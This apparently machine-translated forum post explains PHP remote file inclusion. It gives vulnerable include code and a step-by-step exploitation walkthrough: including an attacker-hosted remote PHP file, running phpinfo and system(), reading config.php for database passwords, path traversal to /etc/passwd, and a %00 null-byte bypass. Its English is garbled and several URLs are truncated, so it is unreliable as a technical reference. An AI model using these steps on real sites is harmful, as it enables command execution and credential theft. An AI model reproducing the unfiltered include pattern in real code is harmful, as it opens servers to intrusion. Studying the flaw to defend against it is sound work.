PHP remote include

PHP remote file contains the vulnerability basic
In this article I will tell PHP remote file contains the principle of vulnerability, the beginning of the programmer's people must look.
The hidden content of this post needs to be replied to be able to browse
The first question is, what is a "remote file Containment vulnerability"? The short answer is that the server through the PHP arbitrary file contains the filter is not strict, to execute a malicious file, this is a programmer filtering problems, please remember that all CGI programs have such a bug.
1. Find the BUG:
In order to find the goal, we first need to know the meaning of two words, in all languages (most) have this method contains arbitrary files. In PHP, we use the Include () function, its workflow:
If you include include1.php in main.php, I will write the include ("include1.php"). Not very scientific, but you need to know the truth.
Let's look at this first, and when the user enters it, it contains the file, which is
if ($_get[page]) {
Include $_get[page];
} else {
Include "home.php";
}
This structure is common in dynamic Web sites, and the question is, does it allow such http://www.target.com/explame.php?page=main.php or http://www.target.com/explame.php? page=downloads.php to view. Anyway, if you have this bug in your program is very sad, only blame you, although it is only a filter problem, but this is the filter to have script hacker. In the zone-h.org survey, the file contains an attack rate of 9.4%, enough for us to attract attention, And it is not a day or two problems, a few years ago, but to today, a batch of programmers still usual, so there is this article, in 2004 to write such an article has been old, but I still want to write, after all, complaints can make a person's profit when it is not called whining.
2. Testing
Here is a remote file contains examples, the purpose is only one, for your program security, we look at the specific
Http://www.target.com/explame.php?page=zizzy
Warning:main (Zizzy): Failed to open stream:no such file or directory in/var/www/htdocs/index.php on line 3
Warning:main (): Failed opening ' zizzy ' for inclusion (include_path= '.:/ Usr/local/lib/php ') in/var/www/htdocs/index.php on line 3
PHP output of these error information tells us that the program to include the file/var/www/htdocs/zizzy, but did not find, see, no such file or directory does not have such a file, now understand it.
3. Use
PHP is really good, you can remotely call the file, then I create a yeah.txt, put on my station http://www.mysite.com/yeah.txt. Content like this
<?
echo "wow,test!";
?>
So Http://www.target.com/explame.php?pa...e.com/yeah.txt
OK, Echo wow,test!, so it executes. Reading config.php is not difficult, it put the MySQL password ah. Write yeah.txt into < phpinfo;?> Look, write system () to try, what feelings, in the excessive point, so submit page=. /.. /.. /.. /.. /.. /.. /etc/passwd. Know what is really contained.
4. Another
Sometimes programmers change their way of writing, which limits the scope of inclusion
if ($_get[page]) {
Include "$_get[page].php";
} else {
Include "home.php";
}
We submit Http://www.target.com/explame.php?pa...e.com/yeah.txt
Warning:main (http://www.mysite.com/yeah.txt.php): Failed to open stream:http request failed! http/1.1 404 Not Found in/var/www/htdocs/explame.php on line 3
Warning:main (): Failed opening ' http://www.mysite.com/yeah.txt.php ' for inclusion (include_path= '.:/ Usr/local/lib/php ') in/var/www/htdocs/explame.php on line 3
Include failed, limit the tail code named PHP, that mysite.com Yeah.txt changed to Yeah.php,ok, so executed the
What about the passwd?
Warning:main (.. /.. /.. /.. /.. /.. /.. /etc/passwd.php): Failed to open stream:http request failed! http/1.1 404 Not Found in/var/www/htdocs/explame.php on line 3
Warning:main (): Failed opening '. /.. /.. /.. /.. /.. /.. /etc/passwd.php ' for inclusion (include_path= '.:/ Usr/local/lib/php ') in/var/www/htdocs/explame.php on line 3
Use a nul character here, that is,% 00来 skip detection
http://www.target.com/explame.php?pa.../etc/passwd%00

PHP remote include